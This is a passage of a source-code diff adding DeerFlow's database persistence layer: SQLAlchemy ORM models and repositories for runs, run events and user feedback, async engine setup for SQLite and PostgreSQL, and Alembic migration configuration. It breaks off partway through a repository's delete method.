||||
class Base(DeclarativeBase):
|
||||
"""Base class for all DeerFlow ORM models.
|
||||
|
||||
Provides:
|
||||
- Automatic to_dict() via SQLAlchemy column inspection.
|
||||
- Standard __repr__() showing all column values.
|
||||
"""
|
||||
|
||||
def to_dict(self, *, exclude: set[str] | None = None) -> dict:
|
||||
"""Convert ORM instance to plain dict.
|
||||
|
||||
Uses SQLAlchemy's inspect() to iterate mapped column attributes.
|
||||
|
||||
Args:
|
||||
exclude: Optional set of column keys to omit.
|
||||
|
||||
Returns:
|
||||
Dict of {column_key: value} for all mapped columns.
|
||||
"""
|
||||
exclude = exclude or set()
|
||||
return {c.key: getattr(self, c.key) for c in sa_inspect(type(self)).mapper.column_attrs if c.key not in exclude}
|
||||
|
||||
def __repr__(self) -> str:
|
||||
cols = ", ".join(f"{c.key}={getattr(self, c.key)!r}" for c in sa_inspect(type(self)).mapper.column_attrs)
|
||||
return f"{type(self).__name__}({cols})"
|
||||
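A minimal sketch of what this Base gives every model, using a throwaway table that is not part of DeerFlow's schema:

```python
# Demo model only -- DemoRow is hypothetical and exists just to show
# to_dict()/__repr__ from the Base above.
from sqlalchemy import String
from sqlalchemy.orm import Mapped, mapped_column

from deerflow.persistence.base import Base


class DemoRow(Base):
    __tablename__ = "demo"

    id: Mapped[str] = mapped_column(String(32), primary_key=True)
    label: Mapped[str | None] = mapped_column(String(64))


row = DemoRow(id="r1", label="example")
print(row.to_dict())                   # {'id': 'r1', 'label': 'example'}
print(row.to_dict(exclude={"label"}))  # {'id': 'r1'}
print(repr(row))                       # DemoRow(id='r1', label='example')
```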
@@ -0,0 +1,185 @@
|
||||
"""Async SQLAlchemy engine lifecycle management.
|
||||
|
||||
Initializes at Gateway startup, provides session factory for
|
||||
repositories, disposes at shutdown.
|
||||
|
||||
When database.backend="memory", init_engine is a no-op and
|
||||
get_session_factory() returns None. Repositories must check for
|
||||
None and fall back to in-memory implementations.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import logging
|
||||
|
||||
from sqlalchemy.ext.asyncio import AsyncEngine, AsyncSession, async_sessionmaker, create_async_engine
|
||||
|
||||
|
||||
def _json_serializer(obj: object) -> str:
|
||||
"""JSON serializer with ensure_ascii=False for Chinese character support."""
|
||||
return json.dumps(obj, ensure_ascii=False)
|
||||
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
_engine: AsyncEngine | None = None
|
||||
_session_factory: async_sessionmaker[AsyncSession] | None = None
|
||||
|
||||
|
||||
async def _auto_create_postgres_db(url: str) -> None:
|
||||
"""Connect to the ``postgres`` maintenance DB and CREATE DATABASE.
|
||||
|
||||
The target database name is extracted from *url*. The connection is
|
||||
made to the default ``postgres`` database on the same server using
|
||||
``AUTOCOMMIT`` isolation (CREATE DATABASE cannot run inside a
|
||||
transaction).
|
||||
"""
|
||||
from sqlalchemy import text
|
||||
from sqlalchemy.engine.url import make_url
|
||||
|
||||
parsed = make_url(url)
|
||||
db_name = parsed.database
|
||||
if not db_name:
|
||||
raise ValueError("Cannot auto-create database: no database name in URL")
|
||||
|
||||
# Connect to the default 'postgres' database to issue CREATE DATABASE
|
||||
maint_url = parsed.set(database="postgres")
|
||||
maint_engine = create_async_engine(maint_url, isolation_level="AUTOCOMMIT")
|
||||
try:
|
||||
async with maint_engine.connect() as conn:
|
||||
await conn.execute(text(f'CREATE DATABASE "{db_name}"'))
|
||||
logger.info("Auto-created PostgreSQL database: %s", db_name)
|
||||
finally:
|
||||
await maint_engine.dispose()
|
||||
|
||||
|
||||
async def init_engine(
|
||||
backend: str,
|
||||
*,
|
||||
url: str = "",
|
||||
echo: bool = False,
|
||||
pool_size: int = 5,
|
||||
sqlite_dir: str = "",
|
||||
) -> None:
|
||||
"""Create the async engine and session factory, then auto-create tables.
|
||||
|
||||
Args:
|
||||
backend: "memory", "sqlite", or "postgres".
|
||||
url: SQLAlchemy async URL (for sqlite/postgres).
|
||||
echo: Echo SQL to log.
|
||||
pool_size: Postgres connection pool size.
|
||||
sqlite_dir: Directory to create for SQLite (ensured to exist).
|
||||
"""
|
||||
global _engine, _session_factory
|
||||
|
||||
if backend == "memory":
|
||||
logger.info("Persistence backend=memory -- ORM engine not initialized")
|
||||
return
|
||||
|
||||
if backend == "postgres":
|
||||
try:
|
||||
import asyncpg # noqa: F401
|
||||
except ImportError:
|
||||
raise ImportError("database.backend is set to 'postgres' but asyncpg is not installed.\nInstall it with:\n uv sync --extra postgres\nOr switch to backend: sqlite in config.yaml for single-node deployment.") from None
|
||||
|
||||
if backend == "sqlite":
|
||||
import os
|
||||
|
||||
from sqlalchemy import event
|
||||
|
||||
os.makedirs(sqlite_dir or ".", exist_ok=True)
|
||||
_engine = create_async_engine(url, echo=echo, json_serializer=_json_serializer)
|
||||
|
||||
# Enable WAL on every new connection. SQLite PRAGMA settings are
|
||||
# per-connection, so we wire the listener instead of running PRAGMA
|
||||
# once at startup. WAL gives concurrent reads + writers without
|
||||
# blocking and is the standard recommendation for any production
|
||||
# SQLite deployment (TC-UPG-06 in AUTH_TEST_PLAN.md). The companion
|
||||
# ``synchronous=NORMAL`` is the safe-and-fast pairing — fsync only
|
||||
# at WAL checkpoint boundaries instead of every commit.
|
||||
@event.listens_for(_engine.sync_engine, "connect")
|
||||
def _enable_sqlite_wal(dbapi_conn, _record): # noqa: ARG001 — SQLAlchemy contract
|
||||
cursor = dbapi_conn.cursor()
|
||||
try:
|
||||
cursor.execute("PRAGMA journal_mode=WAL;")
|
||||
cursor.execute("PRAGMA synchronous=NORMAL;")
|
||||
cursor.execute("PRAGMA foreign_keys=ON;")
|
||||
finally:
|
||||
cursor.close()
|
||||
elif backend == "postgres":
|
||||
_engine = create_async_engine(
|
||||
url,
|
||||
echo=echo,
|
||||
pool_size=pool_size,
|
||||
pool_pre_ping=True,
|
||||
json_serializer=_json_serializer,
|
||||
)
|
||||
else:
|
||||
raise ValueError(f"Unknown persistence backend: {backend!r}")
|
||||
|
||||
_session_factory = async_sessionmaker(_engine, expire_on_commit=False)
|
||||
|
||||
# Auto-create tables (dev convenience). Production should use Alembic.
|
||||
from deerflow.persistence.base import Base
|
||||
|
||||
# Import all models so Base.metadata discovers them.
|
||||
# When no models exist yet (scaffolding phase), this is a no-op.
|
||||
try:
|
||||
import deerflow.persistence.models # noqa: F401
|
||||
except ImportError:
|
||||
# Models package not yet available — tables won't be auto-created.
|
||||
# This is expected during initial scaffolding or minimal installs.
|
||||
logger.debug("deerflow.persistence.models not found; skipping auto-create tables")
|
||||
|
||||
try:
|
||||
async with _engine.begin() as conn:
|
||||
await conn.run_sync(Base.metadata.create_all)
|
||||
except Exception as exc:
|
||||
if backend == "postgres" and "does not exist" in str(exc):
|
||||
# Database not yet created — attempt to auto-create it, then retry.
|
||||
await _auto_create_postgres_db(url)
|
||||
# Rebuild engine against the now-existing database
|
||||
await _engine.dispose()
|
||||
_engine = create_async_engine(url, echo=echo, pool_size=pool_size, pool_pre_ping=True, json_serializer=_json_serializer)
|
||||
_session_factory = async_sessionmaker(_engine, expire_on_commit=False)
|
||||
async with _engine.begin() as conn:
|
||||
await conn.run_sync(Base.metadata.create_all)
|
||||
else:
|
||||
raise
|
||||
|
||||
logger.info("Persistence engine initialized: backend=%s", backend)
|
||||
|
||||
|
||||
async def init_engine_from_config(config) -> None:
|
||||
"""Convenience: init engine from a DatabaseConfig object."""
|
||||
if config.backend == "memory":
|
||||
await init_engine("memory")
|
||||
return
|
||||
await init_engine(
|
||||
backend=config.backend,
|
||||
url=config.app_sqlalchemy_url,
|
||||
echo=config.echo_sql,
|
||||
pool_size=config.pool_size,
|
||||
sqlite_dir=config.sqlite_dir if config.backend == "sqlite" else "",
|
||||
)
|
||||
|
||||
|
||||
def get_session_factory() -> async_sessionmaker[AsyncSession] | None:
|
||||
"""Return the async session factory, or None if backend=memory."""
|
||||
return _session_factory
|
||||
|
||||
|
||||
def get_engine() -> AsyncEngine | None:
|
||||
"""Return the async engine, or None if not initialized."""
|
||||
return _engine
|
||||
|
||||
|
||||
async def close_engine() -> None:
|
||||
"""Dispose the engine, release all connections."""
|
||||
global _engine, _session_factory
|
||||
if _engine is not None:
|
||||
await _engine.dispose()
|
||||
logger.info("Persistence engine closed")
|
||||
_engine = None
|
||||
_session_factory = None
|
||||
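A minimal lifecycle sketch using the documented public entry points in `deerflow.persistence` (in the real Gateway this runs in the startup/shutdown hooks); the URL and directory here are illustrative, since `DatabaseConfig.app_sqlalchemy_url` normally supplies them:

```python
# Hedged sketch of the engine lifecycle: init, grab the factory, dispose.
import asyncio

from deerflow.persistence import close_engine, get_session_factory, init_engine


async def main() -> None:
    await init_engine(
        "sqlite",
        url="sqlite+aiosqlite:///.deer-flow/data/app.db",
        sqlite_dir=".deer-flow/data",
    )
    try:
        session_factory = get_session_factory()
        if session_factory is None:
            # memory backend: repositories fall back to in-memory stores
            return
        async with session_factory() as session:  # hand sessions to repositories
            pass
    finally:
        await close_engine()


asyncio.run(main())
```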
@@ -0,0 +1,6 @@
|
||||
"""Feedback persistence — ORM and SQL repository."""
|
||||
|
||||
from deerflow.persistence.feedback.model import FeedbackRow
|
||||
from deerflow.persistence.feedback.sql import FeedbackRepository
|
||||
|
||||
__all__ = ["FeedbackRepository", "FeedbackRow"]
|
||||
@@ -0,0 +1,30 @@
|
||||
"""ORM model for user feedback on runs."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from datetime import UTC, datetime
|
||||
|
||||
from sqlalchemy import DateTime, String, Text
|
||||
from sqlalchemy.orm import Mapped, mapped_column
|
||||
|
||||
from deerflow.persistence.base import Base
|
||||
|
||||
|
||||
class FeedbackRow(Base):
|
||||
__tablename__ = "feedback"
|
||||
|
||||
feedback_id: Mapped[str] = mapped_column(String(64), primary_key=True)
|
||||
run_id: Mapped[str] = mapped_column(String(64), nullable=False, index=True)
|
||||
thread_id: Mapped[str] = mapped_column(String(64), nullable=False, index=True)
|
||||
owner_id: Mapped[str | None] = mapped_column(String(64), index=True)
|
||||
message_id: Mapped[str | None] = mapped_column(String(64))
|
||||
# message_id is an optional RunEventStore event identifier —
|
||||
# allows feedback to target a specific message or the entire run
|
||||
|
||||
rating: Mapped[int] = mapped_column(nullable=False)
|
||||
# +1 (thumbs-up) or -1 (thumbs-down)
|
||||
|
||||
comment: Mapped[str | None] = mapped_column(Text)
|
||||
# Optional text feedback from the user
|
||||
|
||||
created_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(UTC))
|
||||
@@ -0,0 +1,139 @@
|
||||
"""SQLAlchemy-backed feedback storage.
|
||||
|
||||
Each method acquires its own short-lived session.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import uuid
|
||||
from datetime import UTC, datetime
|
||||
|
||||
from sqlalchemy import case, func, select
|
||||
from sqlalchemy.ext.asyncio import AsyncSession, async_sessionmaker
|
||||
|
||||
from deerflow.persistence.feedback.model import FeedbackRow
|
||||
from deerflow.runtime.user_context import AUTO, _AutoSentinel, resolve_owner_id
|
||||
|
||||
|
||||
class FeedbackRepository:
|
||||
def __init__(self, session_factory: async_sessionmaker[AsyncSession]) -> None:
|
||||
self._sf = session_factory
|
||||
|
||||
@staticmethod
|
||||
def _row_to_dict(row: FeedbackRow) -> dict:
|
||||
d = row.to_dict()
|
||||
val = d.get("created_at")
|
||||
if isinstance(val, datetime):
|
||||
d["created_at"] = val.isoformat()
|
||||
return d
|
||||
|
||||
async def create(
|
||||
self,
|
||||
*,
|
||||
run_id: str,
|
||||
thread_id: str,
|
||||
rating: int,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
message_id: str | None = None,
|
||||
comment: str | None = None,
|
||||
) -> dict:
|
||||
"""Create a feedback record. rating must be +1 or -1."""
|
||||
if rating not in (1, -1):
|
||||
raise ValueError(f"rating must be +1 or -1, got {rating}")
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="FeedbackRepository.create")
|
||||
row = FeedbackRow(
|
||||
feedback_id=str(uuid.uuid4()),
|
||||
run_id=run_id,
|
||||
thread_id=thread_id,
|
||||
owner_id=resolved_owner_id,
|
||||
message_id=message_id,
|
||||
rating=rating,
|
||||
comment=comment,
|
||||
created_at=datetime.now(UTC),
|
||||
)
|
||||
async with self._sf() as session:
|
||||
session.add(row)
|
||||
await session.commit()
|
||||
await session.refresh(row)
|
||||
return self._row_to_dict(row)
|
||||
|
||||
async def get(
|
||||
self,
|
||||
feedback_id: str,
|
||||
*,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
) -> dict | None:
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="FeedbackRepository.get")
|
||||
async with self._sf() as session:
|
||||
row = await session.get(FeedbackRow, feedback_id)
|
||||
if row is None:
|
||||
return None
|
||||
if resolved_owner_id is not None and row.owner_id != resolved_owner_id:
|
||||
return None
|
||||
return self._row_to_dict(row)
|
||||
|
||||
async def list_by_run(
|
||||
self,
|
||||
thread_id: str,
|
||||
run_id: str,
|
||||
*,
|
||||
limit: int = 100,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
) -> list[dict]:
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="FeedbackRepository.list_by_run")
|
||||
stmt = select(FeedbackRow).where(FeedbackRow.thread_id == thread_id, FeedbackRow.run_id == run_id)
|
||||
if resolved_owner_id is not None:
|
||||
stmt = stmt.where(FeedbackRow.owner_id == resolved_owner_id)
|
||||
stmt = stmt.order_by(FeedbackRow.created_at.asc()).limit(limit)
|
||||
async with self._sf() as session:
|
||||
result = await session.execute(stmt)
|
||||
return [self._row_to_dict(r) for r in result.scalars()]
|
||||
|
||||
async def list_by_thread(
|
||||
self,
|
||||
thread_id: str,
|
||||
*,
|
||||
limit: int = 100,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
) -> list[dict]:
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="FeedbackRepository.list_by_thread")
|
||||
stmt = select(FeedbackRow).where(FeedbackRow.thread_id == thread_id)
|
||||
if resolved_owner_id is not None:
|
||||
stmt = stmt.where(FeedbackRow.owner_id == resolved_owner_id)
|
||||
stmt = stmt.order_by(FeedbackRow.created_at.asc()).limit(limit)
|
||||
async with self._sf() as session:
|
||||
result = await session.execute(stmt)
|
||||
return [self._row_to_dict(r) for r in result.scalars()]
|
||||
|
||||
async def delete(
|
||||
self,
|
||||
feedback_id: str,
|
||||
*,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
) -> bool:
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="FeedbackRepository.delete")
|
||||
async with self._sf() as session:
|
||||
row = await session.get(FeedbackRow, feedback_id)
|
||||
if row is None:
|
||||
return False
|
||||
if resolved_owner_id is not None and row.owner_id != resolved_owner_id:
|
||||
return False
|
||||
await session.delete(row)
|
||||
await session.commit()
|
||||
return True
|
||||
|
||||
async def aggregate_by_run(self, thread_id: str, run_id: str) -> dict:
|
||||
"""Aggregate feedback stats for a run using database-side counting."""
|
||||
stmt = select(
|
||||
func.count().label("total"),
|
||||
func.coalesce(func.sum(case((FeedbackRow.rating == 1, 1), else_=0)), 0).label("positive"),
|
||||
func.coalesce(func.sum(case((FeedbackRow.rating == -1, 1), else_=0)), 0).label("negative"),
|
||||
).where(FeedbackRow.thread_id == thread_id, FeedbackRow.run_id == run_id)
|
||||
async with self._sf() as session:
|
||||
row = (await session.execute(stmt)).one()
|
||||
return {
|
||||
"run_id": run_id,
|
||||
"total": row.total,
|
||||
"positive": row.positive,
|
||||
"negative": row.negative,
|
||||
}
|
||||
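A hedged usage sketch for the repository above. It assumes the persistence engine has already been initialized (so `get_session_factory()` returns a factory) and passes `owner_id` explicitly rather than relying on the AUTO user-context resolution:

```python
# Hedged sketch: identifiers and comment text are made up.
from deerflow.persistence import get_session_factory
from deerflow.persistence.feedback.sql import FeedbackRepository


async def leave_feedback() -> None:
    repo = FeedbackRepository(get_session_factory())
    created = await repo.create(
        run_id="run-1",
        thread_id="thread-1",
        rating=1,                 # must be +1 or -1
        comment="helpful answer",
        owner_id="user-1",
    )
    print(created["feedback_id"], created["created_at"])
    stats = await repo.aggregate_by_run("thread-1", "run-1")
    # stats == {"run_id": "run-1", "total": 1, "positive": 1, "negative": 0}
    print(stats)
```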
@@ -0,0 +1,38 @@
|
||||
[alembic]
|
||||
script_location = %(here)s
|
||||
# Default URL for offline mode / autogenerate.
|
||||
# Runtime uses engine from DeerFlow config.
|
||||
sqlalchemy.url = sqlite+aiosqlite:///./data/app.db
|
||||
|
||||
[loggers]
|
||||
keys = root,sqlalchemy,alembic
|
||||
|
||||
[handlers]
|
||||
keys = console
|
||||
|
||||
[formatters]
|
||||
keys = generic
|
||||
|
||||
[logger_root]
|
||||
level = WARN
|
||||
handlers = console
|
||||
|
||||
[logger_sqlalchemy]
|
||||
level = WARN
|
||||
handlers =
|
||||
qualname = sqlalchemy.engine
|
||||
|
||||
[logger_alembic]
|
||||
level = INFO
|
||||
handlers =
|
||||
qualname = alembic
|
||||
|
||||
[handler_console]
|
||||
class = StreamHandler
|
||||
args = (sys.stderr,)
|
||||
level = NOTSET
|
||||
formatter = generic
|
||||
|
||||
[formatter_generic]
|
||||
format = %(levelname)-5.5s [%(name)s] %(message)s
|
||||
datefmt = %H:%M:%S
|
||||
@@ -0,0 +1,65 @@
|
||||
"""Alembic environment for DeerFlow application tables.
|
||||
|
||||
ONLY manages DeerFlow's tables (runs, threads_meta, cron_jobs, users).
|
||||
LangGraph's checkpointer tables are managed by LangGraph itself -- they
|
||||
have their own schema lifecycle and must not be touched by Alembic.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
from logging.config import fileConfig
|
||||
|
||||
from alembic import context
|
||||
from sqlalchemy.ext.asyncio import create_async_engine
|
||||
|
||||
from deerflow.persistence.base import Base
|
||||
|
||||
# Import all models so metadata is populated.
|
||||
try:
|
||||
import deerflow.persistence.models # noqa: F401 — register ORM models with Base.metadata
|
||||
except ImportError:
|
||||
# Models not available — migration will work with existing metadata only.
|
||||
logging.getLogger(__name__).warning("Could not import deerflow.persistence.models; Alembic may not detect all tables")
|
||||
|
||||
config = context.config
|
||||
if config.config_file_name is not None:
|
||||
fileConfig(config.config_file_name)
|
||||
|
||||
target_metadata = Base.metadata
|
||||
|
||||
|
||||
def run_migrations_offline() -> None:
|
||||
url = config.get_main_option("sqlalchemy.url")
|
||||
context.configure(
|
||||
url=url,
|
||||
target_metadata=target_metadata,
|
||||
literal_binds=True,
|
||||
render_as_batch=True,
|
||||
)
|
||||
with context.begin_transaction():
|
||||
context.run_migrations()
|
||||
|
||||
|
||||
def do_run_migrations(connection):
|
||||
context.configure(
|
||||
connection=connection,
|
||||
target_metadata=target_metadata,
|
||||
render_as_batch=True, # Required for SQLite ALTER TABLE support
|
||||
)
|
||||
with context.begin_transaction():
|
||||
context.run_migrations()
|
||||
|
||||
|
||||
async def run_migrations_online() -> None:
|
||||
connectable = create_async_engine(config.get_main_option("sqlalchemy.url"))
|
||||
async with connectable.connect() as connection:
|
||||
await connection.run_sync(do_run_migrations)
|
||||
await connectable.dispose()
|
||||
|
||||
|
||||
if context.is_offline_mode():
|
||||
run_migrations_offline()
|
||||
else:
|
||||
asyncio.run(run_migrations_online())
|
||||
@@ -0,0 +1,23 @@
|
||||
"""ORM model registration entry point.
|
||||
|
||||
Importing this module ensures all ORM models are registered with
|
||||
``Base.metadata`` so Alembic autogenerate detects every table.
|
||||
|
||||
The actual ORM classes have moved to entity-specific subpackages:
|
||||
- ``deerflow.persistence.thread_meta``
|
||||
- ``deerflow.persistence.run``
|
||||
- ``deerflow.persistence.feedback``
|
||||
- ``deerflow.persistence.user``
|
||||
|
||||
``RunEventRow`` remains in ``deerflow.persistence.models.run_event`` because
|
||||
its storage implementation lives in ``deerflow.runtime.events.store.db`` and
|
||||
there is no matching entity directory.
|
||||
"""
|
||||
|
||||
from deerflow.persistence.feedback.model import FeedbackRow
|
||||
from deerflow.persistence.models.run_event import RunEventRow
|
||||
from deerflow.persistence.run.model import RunRow
|
||||
from deerflow.persistence.thread_meta.model import ThreadMetaRow
|
||||
from deerflow.persistence.user.model import UserRow
|
||||
|
||||
__all__ = ["FeedbackRow", "RunEventRow", "RunRow", "ThreadMetaRow", "UserRow"]
|
||||
@@ -0,0 +1,35 @@
|
||||
"""ORM model for run events."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from datetime import UTC, datetime
|
||||
|
||||
from sqlalchemy import JSON, DateTime, Index, String, Text, UniqueConstraint
|
||||
from sqlalchemy.orm import Mapped, mapped_column
|
||||
|
||||
from deerflow.persistence.base import Base
|
||||
|
||||
|
||||
class RunEventRow(Base):
|
||||
__tablename__ = "run_events"
|
||||
|
||||
id: Mapped[int] = mapped_column(primary_key=True, autoincrement=True)
|
||||
thread_id: Mapped[str] = mapped_column(String(64), nullable=False)
|
||||
run_id: Mapped[str] = mapped_column(String(64), nullable=False)
|
||||
# Owner of the conversation this event belongs to. Nullable for data
|
||||
# created before auth was introduced; populated by auth middleware on
|
||||
# new writes and by the boot-time orphan migration on existing rows.
|
||||
owner_id: Mapped[str | None] = mapped_column(String(64), nullable=True, index=True)
|
||||
event_type: Mapped[str] = mapped_column(String(32), nullable=False)
|
||||
category: Mapped[str] = mapped_column(String(16), nullable=False)
|
||||
# "message" | "trace" | "lifecycle"
|
||||
content: Mapped[str] = mapped_column(Text, default="")
|
||||
event_metadata: Mapped[dict] = mapped_column(JSON, default=dict)
|
||||
seq: Mapped[int] = mapped_column(nullable=False)
|
||||
created_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(UTC))
|
||||
|
||||
__table_args__ = (
|
||||
UniqueConstraint("thread_id", "seq", name="uq_events_thread_seq"),
|
||||
Index("ix_events_thread_cat_seq", "thread_id", "category", "seq"),
|
||||
Index("ix_events_run", "thread_id", "run_id", "seq"),
|
||||
)
|
||||
@@ -0,0 +1,6 @@
|
||||
"""Run metadata persistence — ORM and SQL repository."""
|
||||
|
||||
from deerflow.persistence.run.model import RunRow
|
||||
from deerflow.persistence.run.sql import RunRepository
|
||||
|
||||
__all__ = ["RunRepository", "RunRow"]
|
||||
@@ -0,0 +1,49 @@
|
||||
"""ORM model for run metadata."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from datetime import UTC, datetime
|
||||
|
||||
from sqlalchemy import JSON, DateTime, Index, String, Text
|
||||
from sqlalchemy.orm import Mapped, mapped_column
|
||||
|
||||
from deerflow.persistence.base import Base
|
||||
|
||||
|
||||
class RunRow(Base):
|
||||
__tablename__ = "runs"
|
||||
|
||||
run_id: Mapped[str] = mapped_column(String(64), primary_key=True)
|
||||
thread_id: Mapped[str] = mapped_column(String(64), nullable=False, index=True)
|
||||
assistant_id: Mapped[str | None] = mapped_column(String(128))
|
||||
owner_id: Mapped[str | None] = mapped_column(String(64), index=True)
|
||||
status: Mapped[str] = mapped_column(String(20), default="pending")
|
||||
# "pending" | "running" | "success" | "error" | "timeout" | "interrupted"
|
||||
|
||||
model_name: Mapped[str | None] = mapped_column(String(128))
|
||||
multitask_strategy: Mapped[str] = mapped_column(String(20), default="reject")
|
||||
metadata_json: Mapped[dict] = mapped_column(JSON, default=dict)
|
||||
kwargs_json: Mapped[dict] = mapped_column(JSON, default=dict)
|
||||
error: Mapped[str | None] = mapped_column(Text)
|
||||
|
||||
# Convenience fields (for listing pages without querying RunEventStore)
|
||||
message_count: Mapped[int] = mapped_column(default=0)
|
||||
first_human_message: Mapped[str | None] = mapped_column(Text)
|
||||
last_ai_message: Mapped[str | None] = mapped_column(Text)
|
||||
|
||||
# Token usage (accumulated in-memory by RunJournal, written on run completion)
|
||||
total_input_tokens: Mapped[int] = mapped_column(default=0)
|
||||
total_output_tokens: Mapped[int] = mapped_column(default=0)
|
||||
total_tokens: Mapped[int] = mapped_column(default=0)
|
||||
llm_call_count: Mapped[int] = mapped_column(default=0)
|
||||
lead_agent_tokens: Mapped[int] = mapped_column(default=0)
|
||||
subagent_tokens: Mapped[int] = mapped_column(default=0)
|
||||
middleware_tokens: Mapped[int] = mapped_column(default=0)
|
||||
|
||||
# Follow-up association
|
||||
follow_up_to_run_id: Mapped[str | None] = mapped_column(String(64))
|
||||
|
||||
created_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(UTC))
|
||||
updated_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(UTC), onupdate=lambda: datetime.now(UTC))
|
||||
|
||||
__table_args__ = (Index("ix_runs_thread_status", "thread_id", "status"),)
|
||||
@@ -0,0 +1,255 @@
|
||||
"""SQLAlchemy-backed RunStore implementation.
|
||||
|
||||
Each method acquires and releases its own short-lived session.
|
||||
Run status updates come from background workers that may run for
|
||||
minutes -- so we don't hold a connection open across that long-running work.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
from datetime import UTC, datetime
|
||||
from typing import Any
|
||||
|
||||
from sqlalchemy import func, select, update
|
||||
from sqlalchemy.ext.asyncio import AsyncSession, async_sessionmaker
|
||||
|
||||
from deerflow.persistence.run.model import RunRow
|
||||
from deerflow.runtime.runs.store.base import RunStore
|
||||
from deerflow.runtime.user_context import AUTO, _AutoSentinel, resolve_owner_id
|
||||
|
||||
|
||||
class RunRepository(RunStore):
|
||||
def __init__(self, session_factory: async_sessionmaker[AsyncSession]) -> None:
|
||||
self._sf = session_factory
|
||||
|
||||
@staticmethod
|
||||
def _safe_json(obj: Any) -> Any:
|
||||
"""Ensure obj is JSON-serializable. Falls back to model_dump() or str()."""
|
||||
if obj is None:
|
||||
return None
|
||||
if isinstance(obj, (str, int, float, bool)):
|
||||
return obj
|
||||
if isinstance(obj, dict):
|
||||
return {k: RunRepository._safe_json(v) for k, v in obj.items()}
|
||||
if isinstance(obj, (list, tuple)):
|
||||
return [RunRepository._safe_json(v) for v in obj]
|
||||
if hasattr(obj, "model_dump"):
|
||||
try:
|
||||
return obj.model_dump()
|
||||
except Exception:
|
||||
pass
|
||||
if hasattr(obj, "dict"):
|
||||
try:
|
||||
return obj.dict()
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
json.dumps(obj)
|
||||
return obj
|
||||
except (TypeError, ValueError):
|
||||
return str(obj)
|
||||
|
||||
@staticmethod
|
||||
def _row_to_dict(row: RunRow) -> dict[str, Any]:
|
||||
d = row.to_dict()
|
||||
# Remap JSON columns to match RunStore interface
|
||||
d["metadata"] = d.pop("metadata_json", {})
|
||||
d["kwargs"] = d.pop("kwargs_json", {})
|
||||
# Convert datetime to ISO string for consistency with MemoryRunStore
|
||||
for key in ("created_at", "updated_at"):
|
||||
val = d.get(key)
|
||||
if isinstance(val, datetime):
|
||||
d[key] = val.isoformat()
|
||||
return d
|
||||
|
||||
async def put(
|
||||
self,
|
||||
run_id,
|
||||
*,
|
||||
thread_id,
|
||||
assistant_id=None,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
status="pending",
|
||||
multitask_strategy="reject",
|
||||
metadata=None,
|
||||
kwargs=None,
|
||||
error=None,
|
||||
created_at=None,
|
||||
follow_up_to_run_id=None,
|
||||
):
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="RunRepository.put")
|
||||
now = datetime.now(UTC)
|
||||
row = RunRow(
|
||||
run_id=run_id,
|
||||
thread_id=thread_id,
|
||||
assistant_id=assistant_id,
|
||||
owner_id=resolved_owner_id,
|
||||
status=status,
|
||||
multitask_strategy=multitask_strategy,
|
||||
metadata_json=self._safe_json(metadata) or {},
|
||||
kwargs_json=self._safe_json(kwargs) or {},
|
||||
error=error,
|
||||
follow_up_to_run_id=follow_up_to_run_id,
|
||||
created_at=datetime.fromisoformat(created_at) if created_at else now,
|
||||
updated_at=now,
|
||||
)
|
||||
async with self._sf() as session:
|
||||
session.add(row)
|
||||
await session.commit()
|
||||
|
||||
async def get(
|
||||
self,
|
||||
run_id,
|
||||
*,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
):
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="RunRepository.get")
|
||||
async with self._sf() as session:
|
||||
row = await session.get(RunRow, run_id)
|
||||
if row is None:
|
||||
return None
|
||||
if resolved_owner_id is not None and row.owner_id != resolved_owner_id:
|
||||
return None
|
||||
return self._row_to_dict(row)
|
||||
|
||||
async def list_by_thread(
|
||||
self,
|
||||
thread_id,
|
||||
*,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
limit=100,
|
||||
):
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="RunRepository.list_by_thread")
|
||||
stmt = select(RunRow).where(RunRow.thread_id == thread_id)
|
||||
if resolved_owner_id is not None:
|
||||
stmt = stmt.where(RunRow.owner_id == resolved_owner_id)
|
||||
stmt = stmt.order_by(RunRow.created_at.desc()).limit(limit)
|
||||
async with self._sf() as session:
|
||||
result = await session.execute(stmt)
|
||||
return [self._row_to_dict(r) for r in result.scalars()]
|
||||
|
||||
async def update_status(self, run_id, status, *, error=None):
|
||||
values: dict[str, Any] = {"status": status, "updated_at": datetime.now(UTC)}
|
||||
if error is not None:
|
||||
values["error"] = error
|
||||
async with self._sf() as session:
|
||||
await session.execute(update(RunRow).where(RunRow.run_id == run_id).values(**values))
|
||||
await session.commit()
|
||||
|
||||
async def delete(
|
||||
self,
|
||||
run_id,
|
||||
*,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
):
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="RunRepository.delete")
|
||||
async with self._sf() as session:
|
